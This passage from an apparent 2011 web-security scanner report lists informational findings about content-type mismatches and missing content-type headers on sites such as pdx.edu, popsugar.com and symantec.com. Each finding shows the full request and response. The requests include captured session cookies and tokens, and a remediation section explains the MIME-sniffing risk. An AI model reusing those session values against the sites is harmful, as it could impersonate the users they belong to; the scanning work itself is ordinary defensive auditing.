Content-Type: image/gif
Content-Length: 1337
Date: Mon, 12 Sep 2011 12:48:40 GMT
X-Varnish: 1072006045 1071999776
Age: 6591
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT

.PNG
.
...IHDR.......^......}......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..XMH.Z.>qR.Cg.Z..).......B..K.n..E......E...J..>.BA....A7]..K....3<..*...m.K.0In2...
s d2...w~...Q.c....4.*...........5.
...[SNIP]...

17.25. http://www.mtv.co.uk/files/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mtv.co.uk
Path:   /files/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /files/favicon.ico HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 28 Jun 2011 10:27:55 GMT
ETag: "2373e-57e-1ef440c0"
Accept-Ranges: bytes
Content-Length: 1406
Debug: lnioxp005wuk
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=593156
Expires: Mon, 19 Sep 2011 09:36:34 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

..............h.......(....... ...................................................eee.................rrr.........666.........            .........nnn.........................000.........................;;;...
...[SNIP]...

17.26. http://www.onsugar.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.onsugar.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web018-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-type: image/gif
Date: Mon, 12 Sep 2011 13:03:09 GMT
Server: lighttpd/1.4.26
Content-Length: 634

.PNG
.
...IHDR................a...    pHYs................ cHRM..m...s....N......n....=..3............IDATx.\..jTA......g....$DP...c.Gp..("..E.....hV......{.FQ\$ ...f....]..1X...U..U_...6.+t~...".....
...[SNIP]...

17.27. http://www.pdx.edu/sites/all/themes/pdx_home/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pdx.edu
Path:   /sites/all/themes/pdx_home/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/pdx_home/favicon.ico HTTP/1.1
Host: www.pdx.edu
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; __utma=237067329.1743793829.1315849744.1315849744.1315849744.1; __utmb=237067329.1.10.1315849744; __utmc=237067329; __utmz=237067329.1315849744.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 04 Aug 2011 15:19:09 GMT
ETag: "2e9e8-47e-4a9af809d3540"
Cache-Control: max-age=1209600
Expires: Thu, 22 Sep 2011 03:57:42 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150
Date: Mon, 12 Sep 2011 12:50:05 GMT
X-Varnish: 2032713920 2028186911
Age: 377543
Via: 1.1 varnish
Connection: keep-alive
X-backend: castor

............ .h.......(....... ..... ..................................................j.D...l...>................................................j9..k.8...C.....m..j6..............................
...[SNIP]...

17.28. http://www.pdx.edu/sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.pdx.edu
Path:   /sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff HTTP/1.1
Host: www.pdx.edu
Proxy-Connection: keep-alive
Referer: http://www.pdx.edu/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 04 Aug 2011 15:19:09 GMT
ETag: "2ea3e-70a8-4a9af809d3540"
Cache-Control: max-age=1209600
Expires: Thu, 22 Sep 2011 03:57:14 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 28840
Date: Mon, 12 Sep 2011 12:49:59 GMT
X-Varnish: 2032713838 2028186509
Age: 377565
Via: 1.1 varnish
Connection: keep-alive
X-backend: castor

wOFF......p........8........................FFTM..p.........SQM\GDEF..f....3...8.;..GPOS..h(...b....~...GSUB..g$.......d....OS/2.......Z...`.Lz.cmap...x...y......A:cvt .......$...$....fpgm...........e
...[SNIP]...

17.29. http://www.popsugar.com/ajaxharness

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /ajaxharness?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 213380
Date: Mon, 12 Sep 2011 12:47:57 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831677%7C4rKS2S0tUEAw%2FPSqsUWVtSmuIoYL0q9Jw8K5Dmnwz6q%2FsDXs%2BlLhGi%2F7UJ81NlU7nVxY6mcTcBwYD5tn0e1sYPWUKt1Zxe1GMPGeUjdMgE1nefSrrjH758DCT%2BLe6XijyBl1F2pRC3ztkQ6Sb9nmCSV18VS7YX%2BzR5gblWNTBGlNXo13Lde1o3bdgY7zzHkM9Dw2%2Fvxo6dn0YaVAACjkVw%3D%3D%7C9cb6eff54ecc9dfd5bd9438bb38f7dd11e46c683; expires=Wed, 05-Oct-2011 16:21:17 GMT; path=/; httponly

{"replacements":{"sugar-menu-subnav-items":" \n \n \n\n\n\n\n<div id='sn-popsugar' class='site-dropdown popsugar-hp '>\n <div class='sn-col sn-col-1'>\n
...[SNIP]...

17.30. http://www.popsugar.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.popsugar.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025; ss1=0%7C1317831677%7C4rKS2S0tUEAw%2FPSqsUWVtSmuIoYL0q9Jw8K5Dmnwz6q%2FsDXs%2BlLhGi%2F7UJ81NlU7nVxY6mcTcBwYD5tn0e1sYPWUKt1Zxe1GMPGeUjdMgE1nefSrrjH758DCT%2BLe6XijyBl1F2pRC3ztkQ6Sb9nmCSV18VS7YX%2BzR5gblWNTBGlNXo13Lde1o3bdgY7zzHkM9Dw2%2Fvxo6dn0YaVAACjkVw%3D%3D%7C9cb6eff54ecc9dfd5bd9438bb38f7dd11e46c683

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Content-Type: image/gif
Server: lighttpd/1.4.26
Content-Length: 294
Date: Mon, 12 Sep 2011 12:47:59 GMT
Connection: close

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b`....Lm...|j..h..R..\E.#....c.c8.f.(. ..H..@.>.r....#if.......P@Z......M#6.r.. ~...Y..z......(;..... 5..4......H.G.!`.(
...[SNIP]...

17.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT
ETag: "a680e3-47e-491d5c7eb70c0"
Content-Type: text/plain; charset=UTF-8
X-Varnish: 312037258
Vary: Accept-Encoding
Content-Length: 1150
Cache-Control: max-age=3084
Date: Mon, 12 Sep 2011 12:48:05 GMT
Connection: close

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

18. Content type is not specified

There are 2 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


18.1. http://ad.yieldmanager.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; 

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:29 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:29 GMT
Pragma: no-cache
Content-Length: 4383
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

18.2. http://ads.bluelithium.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:32 GMT
Pragma: no-cache
Content-Length: 4577
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
